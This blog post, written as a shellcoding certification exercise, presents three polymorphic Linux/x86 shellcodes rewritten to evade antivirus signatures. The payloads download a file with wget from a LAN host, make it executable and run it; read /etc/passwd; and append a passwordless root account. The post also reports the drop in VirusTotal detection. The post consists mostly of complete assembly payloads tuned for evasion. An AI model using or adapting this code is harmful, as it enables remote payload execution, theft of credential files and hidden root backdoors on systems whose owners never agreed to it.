Polymorphism in the context of Shellcoding can be defined as altering the appearance of the code keeping the core functionality intact. Polymorphic shellcodes are created to beat signature based detection mechanisms which is how Antiviruses attempt to detect malicious files on systems.
In this blogpost, we will take three Linux/x86 shellcodes from shell-storm and make a Polymorphic version of each in an attempt to evade signature based detections.
The three Shellcodes are:
- Download, chmod and execute an executable
- Reads 4096 bytes from /etc/passwd file
- Add root user with no password
Let’s begin with the first one.
1. Download, chmod and execute an executable
Original shellcode as taken from shell-storm.org:
In order to check the detection ratio, I quickly constructed an executable with a standard C harness. Below is the detection rate as seen on VirusTotal. As of now, 12/73 Antivirus engines can detect the payload. Now let’s attempt to morph our shellcode and re-upload the file and check the detection rate.
I have added a comment mark wherever I have morphed the instructions:
global _start
section .text
_start:
;fork
xor ebx, ebx ;
mov ebx, 0x1 ;
xor ebx, ebx ;
xor eax,eax
mov al,0x2
int 0x80
xor ebx,ebx
cmp eax,ebx
jz child
;wait(NULL)
xor eax,eax
mov al,0x7
sub al,0x1 ;
inc eax ;
int 0x80
;chmod x
xor ecx,ecx
xor eax, eax
xor edx, edx ;
inc edx ;
dec edx ;
push eax
mov al, 0xf ;chmod
push 0x78 ; x = filename
mov ebx, esp ; pathname
xor ecx, ecx
mov cx, 0x1ff ; 511
int 0x80
;exec x
xor eax, eax
push eax
push 0x78
mov ebx, esp
push eax
mov edx, esp
push ebx
mov ecx, esp
mov al, 20 ;
sub al, 9 ; al = 11
; mov al, 11
int 0x80
child:
;download 192.168.2.222//x with wget
push 0xb
pop eax
cdq
push edx
push 0x782f2f32 ;2//x avoid null byte
push 0x32322e32 ;22.2
push 0x2e383631 ;.861
push 0x2e323931 ;.291
mov ecx,esp
push edx
push 0x74 ;t
push 0x6567772f ;egw/
push 0x6e69622f ;nib/
push 0x7273752f ;rsu/
mov ebx,esp
push edx
push ecx
push ebx
mov ecx,esp
int 0x80As we can see below, after uploading the executable created from our morphed shellcode on VirusTotal, as of the time when I am writing the post, only 3 out of 72 Antivirus engines could detect our payload. However, now that we have submitted it on VT, the paylaod will soon be signatured.
2. Read /etc/passwd
Following is the debugged shellcode:
Morphed version:
global _start
_start:
xor ecx,ecx
mul ecx
mov al,0x5
dec al ;
inc al ;
push ecx
push 0x64777373
push 0x61702f63
push 0x74652f2f
mov ebx,esp
int 0x80
xchg ebx,eax
xchg ecx,eax
xchg eax,ecx ;
xchg ecx,eax ;
mov al,0x3
xor edx,edx
mov dx,0xfff
inc edx ;
dec edx ;
inc edx
int 0x80
xchg edx,eax
xor eax,eax
mov al,0x5 ;
dec al ;
mov al,0x4
mov bl,0x1
int 0x80
xchg ebx,eax
int 0x803. Add root user with no password
Below is the original shellcode:
Here is the morphed version:
section .text
global _start
_start:
push byte 2 ;
push byte 5
pop eax
xor ecx, ecx
push ecx
push 0x64777373
push 0x61702f2f
push 0x6374652f
mov eax, 0x5 ;
mov ebx, esp
mov cx, 02001Q
int 0x80
mov ebx, eax
push byte 4
pop eax
xor edx, edx
mov edx, 0x10 ;
sub edx, 0x10 ;
push edx
push 0x3a3a3a30
push 0x3a303a3a
push 0x74303072
mov ecx, esp
push byte 12
pop edx
int 0x80
xor eax, eax ;
mov eax, 0x6 ;
int 0x80
push byte 1
pop eax
int 0x80
section .data
db random: "loremipsum", 0x0That’s all for this post.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: PA-14690
Morphed shellcodes Github Repo
In the next post, which is the also the last post of this series, we will write our own custom crypter for our payloads.